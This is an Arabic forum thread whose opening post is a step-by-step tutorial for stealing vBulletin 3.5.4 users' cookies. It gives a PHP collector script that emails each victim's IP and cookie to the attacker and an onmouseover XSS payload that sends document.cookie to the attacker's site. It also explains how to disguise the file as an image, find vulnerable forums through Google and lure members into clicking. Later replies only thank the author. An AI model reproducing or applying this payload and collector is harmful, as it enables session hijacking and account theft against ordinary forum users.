![]() |
يالله حيه عسى ما شر يقولون انك غير مشترك معنا. حلفت عليك اشترك بالضغط هنــا لتفعيل بريدك في منتديات الوزير العامة أو اذا لم تصلك رسالة التفعيل-اضغط هنا-التفعيل بشكل يومي
إذا نسيت كلمة المرور في منتديات الوزير العامة-اضغط هنا
| |||||||
| وزارة حماية البريد والأجهزة Mail, protection devices جميع طرق وأساليب إختراق البريد والاجهزة وكيفية التعامل معها والحماية منها وماتوصل اليه العالم اليوم في هذا المجال |
![]() |
| | LinkBack | أدوات الموضوع | طرق مشاهدة الموضوع |
| | رقم المشاركة : 1 | |||
| انا حشرح الثغره امشي معاي خطوه خطوه الخطوه الاولى. اعمل فايل وسميه "exploit.php" ولاتنس الامتداد الخطوه الثانيه.حط بالفايل هذا الكود: كود: <?php $ip_adresse = $_SERVER['REMOTE_ADDR']; if(!empty($ip_adresse)) { echo 'il tuo ip è: ',$ip_adresse; } else { echo 'Impossible d\'afficher l\'IP'; } ?> <a href="log.php"></a><? $xx1=$HTTP_SERVER_VARS['SERVER_PORT']; $day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; else $visitor_info = $REMOTE_HOST; $base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; $x1=`host $REMOTE_ADDR|grep Name`; $x2=$REMOTE_PORT; ?> <?php $****** = $_GET['c']; ?> <?php $myemail = "YOUR ADDRESS E-MAIL"; $today = date("l, F j, Y, g:i a") ; $subject = "Xss Vbulletin" ; $message = "Xss: Hacking Ip: $ip_adresse ******: $****** Url: $base porta usata: $xx1 remote port: $x2 Giorno & Ora : $today \n "; $from = "From: $myemail\r\n"; mail($myemail, $subject, $message, $from); ?> الخطوه الثالثه. ابحث عن السطر: الكود: كود: <?php $myemail = "YOUR ADDRESS E-MAIL"; وبعد ما تحصله الخطوه الرابعه أ. استبدل "YOUR ADDRESS E-MAIL" باميلك بريدك الخطوه الرابعه ب.اترك الملف بمكان قريب, مثل سطح المكتب الخطوه الخامسه.اعمل ملف جديد txt والي ما يعرف يروح سطح المكتب كليك يمين new txt document الخطوه السادسه.ضع بالملف هذا الكود: كود: <pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.******' b='</pre' > الخطوه السابعه. ابحث عن السطر: الكود: كود: location="http://YOUR ADDRESS WEB.com الخطوه الثامنه. استبدل "YOUR ADDRESS WEB.com" بموقعك + المسار الموجود فيه exploit مثال: [عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابط[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]] الخطوه التاسعه.عدل اسم الملف txt بحيث يصبح gif.txt.* مع استبدال * باسم الملف يعني مثلا: image.gif.txt يعني انت حتروح rename واتحط اسم الملف image.gif ونحن حنعتبر اسمه كده الخطوه 10. الان صار عندنا ملفين exploit.php و ملف اسمه image.gif الخطوه11. ارفع الملفين على موقعك مع ملاحظة ان الخطوه الثامنه لها علاقه بالخطوه 11 لانك بتحط المسار تاع الموقع ابحث في قوقل عن "powered by vbulletin 3.5.4" سجل في المنتدى اكتب موضوع واختار قصه حلوه وحط الينك بتاع الي هو اسمه image والي بيدخل عليه بيوصلك بيانات الكوكيز تاعه الي سجل في بالمنتدى ثغره خطيييييييييييييره مع تمنياتي لكم باالمزيد من الاختراقات بالتوفيق
__________________ [عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا] | |||
| | |
| إعلانـات تــجـــاريـــة |
| |
| | رقم المشاركة : 2 | |||
| الحمد لله علي سلامتك واشكرك علي هذا الشرح الوافي والمجهود الجبار بارك الله فيك
__________________ [عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا] | |||
| | |
| إعلانـات تــجـــاريـــة |
| |
| | رقم المشاركة : 3 | |||
| الله يعطيك العافيه على الموضوع تمنياتي لك بالتوفيق | |||
| | |
| إعلانـات تــجـــاريـــة |
| |
![]() |
| أدوات الموضوع | |
| طرق مشاهدة الموضوع | |
| |
المواضيع المتشابهه | ||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| تحذير لمستخدمي الماسنجر الجديد 8 .... ثغرة خطيرة .. | كاتم العبرات | وزارة حماية البريد والأجهزة Mail, protection devices | 6 | 06 Jun 2008 02:13 AM |
| خطوط حلوه حمل بسرعه | هنو | وزارة دروس الفوتوشوب | 0 | 09 Apr 2008 05:20 PM |
| 1000 ريال سعودي للفائز الأول في مسابقة منتديات الوزير العامة الأولى | الوزير | وزارة الإعلان والأخبار العامة Declaration, news | 35 | 05 Feb 2008 02:49 AM |
| 1000 ريال سعودي للفائز الأول في مسابقة منتديات الوزير العامة الثانية | الوزير | وزارة الإعلان والأخبار العامة Declaration, news | 11 | 31 Jan 2008 07:48 PM |
| aaa2004 نائباً للمشرف العام على منتديات الوزير العامة | ABUSMGR | وزارة الإعلان والأخبار العامة Declaration, news | 6 | 15 Nov 2007 10:05 PM |